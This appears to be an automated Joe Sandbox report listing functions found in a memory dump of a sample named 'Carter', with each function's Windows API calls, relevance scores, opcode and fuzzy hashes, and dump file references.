Opcode ID: 8daa6b34ae66c33e98e0b9a5964c7b58d71aa55c53bef98d6a8d7ceb2496736c
Instruction ID: 7a66616f99ecb2809d0506002f8ea8a7fea35bb736924be6c380cf63b2d49699
Opcode Fuzzy Hash: 8daa6b34ae66c33e98e0b9a5964c7b58d71aa55c53bef98d6a8d7ceb2496736c
Instruction Fuzzy Hash: FA111875910208BFDB20AFA5DC84EEEBBBCEF05741F508569F805D7110E6719E819BA0

Function 00AE3F1D Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00B12C4C), ref: 00AE3F57
GetLastError.KERNEL32 ref: 00AE3F66
CreateDirectoryW.KERNEL32(?,00000000), ref: 00AE3F75
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00B12C4C), ref: 00AE3FD2

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 2e214d34bcc1c754239853c26e645556807956f41d644e5851962716df96d953
Instruction ID: 3369b830081ebd6ec509315bb7ad7fffc65444f352fc973b9ed57e0e2883b1fe
Opcode Fuzzy Hash: 2e214d34bcc1c754239853c26e645556807956f41d644e5851962716df96d953
Instruction Fuzzy Hash: 2C21B7719082419F8B10DF29C8859AEB7F4FE55364F50461DF495CB2A1DB30DA45CB42

Function 00A95B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A95B58

Part of subcall function 00A956F8: _memset.LIBCMT ref: 00A95787
Part of subcall function 00A956F8: _wcscpy.LIBCMT ref: 00A957DB
Part of subcall function 00A956F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A957EB

KillTimer.USER32(?,00000001,?,?), ref: 00A95BAD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A95BBC
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AD0D7C

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 45f1a08b0b2f8c45f3653ea3bb62872d7ac0ce1f0c9540b0b56981c854d1ef12
Instruction ID: 2434d53b0e052c893afc95c7c01e6df99d43c61fdcfd5c36a04f7902e3e1bffb
Opcode Fuzzy Hash: 45f1a08b0b2f8c45f3653ea3bb62872d7ac0ce1f0c9540b0b56981c854d1ef12
Instruction Fuzzy Hash: F421C8709047849FEB738B74C895FEABBECAF02304F44448EE6DA57281D7746984CB51

Function 00A9278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00A949C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00A927AF,?,00000001), ref: 00A949F4

_free.LIBCMT ref: 00ACFB04
_free.LIBCMT ref: 00ACFB4B

Part of subcall function 00A929BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A92ADF

Strings

Bad directive syntax error, xrefs: 00ACFB33

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: Bad directive syntax error
API String ID: 2861923089-2118420937
Opcode ID: ed8a43b03ed0a925d6fa7187147bd0c411a2e36184406c5a7e243da277ad45a6
Instruction ID: ee2f370c5059b831a159cdd7179388dda78d306db24246ec39d44adbb0cf880b
Opcode Fuzzy Hash: ed8a43b03ed0a925d6fa7187147bd0c411a2e36184406c5a7e243da277ad45a6
Instruction Fuzzy Hash: E1916B71A10219AFCF04EFA4CD91EEEB7B5BF09350F11456EF816AB2A1DB309A45CB50

Function 00AE9CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00A94AB2: __fread_nolock.LIBCMT ref: 00A94AD0

_wcscmp.LIBCMT ref: 00AE9DE1
_wcscmp.LIBCMT ref: 00AE9DF4

Strings

FILE, xrefs: 00AE9D2D

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 433aab2db2a342eaeb880a30f773e082e6ec30abf2b40660509aa95a7cc9d719
Instruction ID: 0cd6c9a101b7b1f743df88673f323275b6407b770727c518d9ff3ff4b2016e80
Opcode Fuzzy Hash: 433aab2db2a342eaeb880a30f773e082e6ec30abf2b40660509aa95a7cc9d719
Instruction Fuzzy Hash: 2141F872A40349BADF20EBA5CC45FEF77FDDF49710F00446AFA00A7291D67199058764

Function 00A931BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AD032B
GetOpenFileNameW.COMDLG32(?), ref: 00AD0375

Part of subcall function 00AA0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A92A58,?,00008000), ref: 00AA02A4

Part of subcall function 00AA09C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00AA09E4

Strings

X, xrefs: 00AD0343

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: b23c11b563842ae8c936e7ab56465160b8bfb0556a05a5cfbbe8074357445ccc
Instruction ID: bf4bcfddf0cc8b1f7f13ad3c043b40bfe373e95ffee665ad3288ffa53cd4228b
Opcode Fuzzy Hash: b23c11b563842ae8c936e7ab56465160b8bfb0556a05a5cfbbe8074357445ccc
Instruction Fuzzy Hash: 4C219371A002989BDF41DF94C845BEE7BFCAF49300F10405AE405AB281DBB45A88DFA1

Function 00AFD1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4df1a17df12034d0d3b802e69ad27c43391bee503d585affca226a6ed9a4614c
Instruction ID: 7073dba45ca925c7e9318dbc020a0177d1c4abced0bd9f47e163cbb674f95284
Opcode Fuzzy Hash: 4df1a17df12034d0d3b802e69ad27c43391bee503d585affca226a6ed9a4614c
Instruction Fuzzy Hash: 44F158706083459FC715EF68C580A6ABBE6FF88314F14892EF9999B351DB30E945CF82

Function 00A91680 Relevance: 4.7, APIs: 3, Instructions: 187COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A916DB
_memmove.LIBCMT ref: 00A9174C
_memmove.LIBCMT ref: 00A917B9

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 3c1c3e1b779d2539aeea08cb23c284cddf708e6d2b45923f19064794a08bf64e
Instruction ID: 21c0083e88c9553d392776f4b1b7a73f73b1956f44aa6be5fb1a1ab758fee023
Opcode Fuzzy Hash: 3c1c3e1b779d2539aeea08cb23c284cddf708e6d2b45923f19064794a08bf64e
Instruction Fuzzy Hash: 8361AA71A0020AEBDF048F29D980AAE7BF5FF44350F6585A9EC19CF295EB31D960CB51

Function 00A8AAAA Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AA07EC
Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 00AA07F4
Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AA07FF
Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AA080A
Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00AA0812
Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 00AA081A

Part of subcall function 00A9FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00A8AC6B), ref: 00A9FFA7

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A8AD08
OleInitialize.OLE32(00000000), ref: 00A8AD85
CloseHandle.KERNEL32(00000000), ref: 00AC2F56

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: b9d705b28f7bf60f09c0ac731529a1f8f35173a413452facb1e4fcb4a1bf8c1e
Instruction ID: 3c4b98b73b8a409178b193d3ab379d35634962d58b7c5eebf0d85ca70a4fcba4
Opcode Fuzzy Hash: b9d705b28f7bf60f09c0ac731529a1f8f35173a413452facb1e4fcb4a1bf8c1e
Instruction Fuzzy Hash: 0781ECB9A9C2408FC384EF39AD446657FE8FB5A31435089AAD418C7372EF300A49DF94

Function 00A959D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A959F9
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A95A9E
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A95ABB

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 3392c8e2d911915b522ed3a01b7a1fa975dd161797bdfcb0ce78d07d0ceb4b47
Instruction ID: 534e0e9a215835a714b938f2f504c9a0ea7e5f1b9fe8d750e8796cfc95960e9b
Opcode Fuzzy Hash: 3392c8e2d911915b522ed3a01b7a1fa975dd161797bdfcb0ce78d07d0ceb4b47
Instruction Fuzzy Hash: 57319974A057018FDB21DF34D8C9697BBF4FB4A344F000A2EF69A87250DBB1A944CB56

Function 00AA593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00AA5953

Part of subcall function 00AAA39B: __NMSG_WRITE.LIBCMT ref: 00AAA3C2
Part of subcall function 00AAA39B: __NMSG_WRITE.LIBCMT ref: 00AAA3CC

__NMSG_WRITE.LIBCMT ref: 00AA595A

Part of subcall function 00AAA3F8: GetModuleFileNameW.KERNEL32(00000000,00B453BA,00000104,00000004,00000001,00AA1003), ref: 00AAA48A
Part of subcall function 00AAA3F8: ___crtMessageBoxW.LIBCMT ref: 00AAA538

Part of subcall function 00AA32CF: ___crtCorExitProcess.LIBCMT ref: 00AA32D5
Part of subcall function 00AA32CF: ExitProcess.KERNEL32 ref: 00AA32DE

Part of subcall function 00AA8D58: __getptd_noexit.LIBCMT ref: 00AA8D58

RtlAllocateHeap.NTDLL(01740000,00000000,00000001,?,00000004,?,?,00AA1003,?), ref: 00AA597F

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 7796bb318a61f804231a6843417501fdeba8b68dd3db4ea0eb27d8b485577bfc
Instruction ID: 9f90a04531d1d2afcbf27843da9120a9f1e883670100dce9422282e7f93a0bad
Opcode Fuzzy Hash: 7796bb318a61f804231a6843417501fdeba8b68dd3db4ea0eb27d8b485577bfc
Instruction Fuzzy Hash: 4101D236A01F02EFEA152B349902A6F33589F53770F51042BF514AF1D2DFB08D404669

Function 00AE92C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00AE92D6

Part of subcall function 00AA2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00AA9C54,00000000,00AA8D5D,00AA59C3), ref: 00AA2F99
Part of subcall function 00AA2F85: GetLastError.KERNEL32(00000000,?,00AA9C54,00000000,00AA8D5D,00AA59C3), ref: 00AA2FAB

_free.LIBCMT ref: 00AE92E7
_free.LIBCMT ref: 00AE92F9

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction ID: 96d889ea7ad0cd6f1fa102ddfb50637997f48cdd2bf422d3839e25c8bdfb557c
Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction Fuzzy Hash: 78E0C2A12047025BCE20AB3D6A40FE777EC0F88311B14040DB509D3182CF20E8608228

Function 00A85E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON

Download Yara Rule

Strings

CALL, xrefs: 00ABE234

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: e51f7fd8bf592475afe9a6e76c91c78b7662b02b94fbcec72bfb342c50983812
Instruction ID: 80c9c12b20d0aa93fcdfa3e436e25c35eba3435cbf869b002988999b435959ea
Opcode Fuzzy Hash: e51f7fd8bf592475afe9a6e76c91c78b7662b02b94fbcec72bfb342c50983812
Instruction Fuzzy Hash: 98325874608341DFDB24EF24C594A6ABBF1BF84344F15896DE88A9B362D731EC45CB82

Function 00A948B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A948FA

Strings

EA06, xrefs: 00AD08A1

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 43f9847e0d59c24a3c85332b24978b90315b54145a87de78ee67723e1edc0a41
Instruction ID: 99f5eb2fd800f175c8661555911cbeba80e9fd498d8e547ed4dadf7df7e15572
Opcode Fuzzy Hash: 43f9847e0d59c24a3c85332b24978b90315b54145a87de78ee67723e1edc0a41
Instruction Fuzzy Hash: B0416A32F042585BDF219B648951FBF7FF58B5E300F684075E882EB386D6208D8693E2

Function 00AFE139 Relevance: 3.2, APIs: 2, Instructions: 227COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 00AFE20C

Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC

_wcscpy.LIBCMT ref: 00AFE29B

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: __itow__swprintf_strcat_wcscpy
String ID:
API String ID: 1012013722-0
Opcode ID: 4b268954e1d747ad72aa9fbf09e9e4056c870071c58c02ef57f8698c7b546aae
Instruction ID: 6ec6bc70f411e8e53f1e9663a145d43fa9f67ac4ed0e74a6b0dee7ab0130d6d3
Opcode Fuzzy Hash: 4b268954e1d747ad72aa9fbf09e9e4056c870071c58c02ef57f8698c7b546aae
Instruction Fuzzy Hash: 8D912735A00608DFCB28EF68C5859A9B7F5FF59310B55815AF90A8F3A2DB30ED51CB81

Function 00AE6135 Relevance: 3.1, APIs: 2, Instructions: 142COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00AE614E

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: aff73061811ddcd39e53fd23a248c309bda46927b73366f3bd0f8477d28032ae
Instruction ID: 86ab53987fbc1a0a2cc08f144600fa80f03729f18f4d140da6bd95b06c61b766
Opcode Fuzzy Hash: aff73061811ddcd39e53fd23a248c309bda46927b73366f3bd0f8477d28032ae
Instruction Fuzzy Hash: 7741C9B6A002499FDB11EF69C8819EEB7F8FF54390B104A2EE516D7241EB70DE40CB50

Function 00AA0E38 Relevance: 3.1, APIs: 2, Instructions: 94processCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00AA0ED5
CreateToolhelp32Snapshot.KERNEL32 ref: 00AA0EE7

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CloseCreateHandleSnapshotToolhelp32
String ID:
API String ID: 3280610774-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: faf0e8abd85e8a6ad99b83854a581be77d23f9226f929786359fd89049be1482
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: B031C571A00109DFDB28DF58C480969FBB6FF5A300B648AA5E409DB291E731EDC1DBC0

Function 00A95F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00A95FEF

Part of subcall function 00AA359C: __lock.LIBCMT ref: 00AA35A2
Part of subcall function 00AA359C: DecodePointer.KERNEL32(00000001,?,00A96004,00AD8892), ref: 00AA35AE
Part of subcall function 00AA359C: EncodePointer.KERNEL32(?,?,00A96004,00AD8892), ref: 00AA35B9

Part of subcall function 00A95F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A95F18
Part of subcall function 00A95F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A95F2D

Part of subcall function 00A95240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A9526C
Part of subcall function 00A95240: IsDebuggerPresent.KERNEL32 ref: 00A9527E
Part of subcall function 00A95240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00A952E6
Part of subcall function 00A95240: SetCurrentDirectoryW.KERNEL32(?), ref: 00A95366

SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00A9602F

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 95b4ed0e87b1f3f4ea78951d903415ee9dd0b63a5310bdd6718c992230dca05b
Instruction ID: 98b4262840d1a1a71c66b6c879fbe8d72cd1dc63fcaad8cb08865a88c9542512
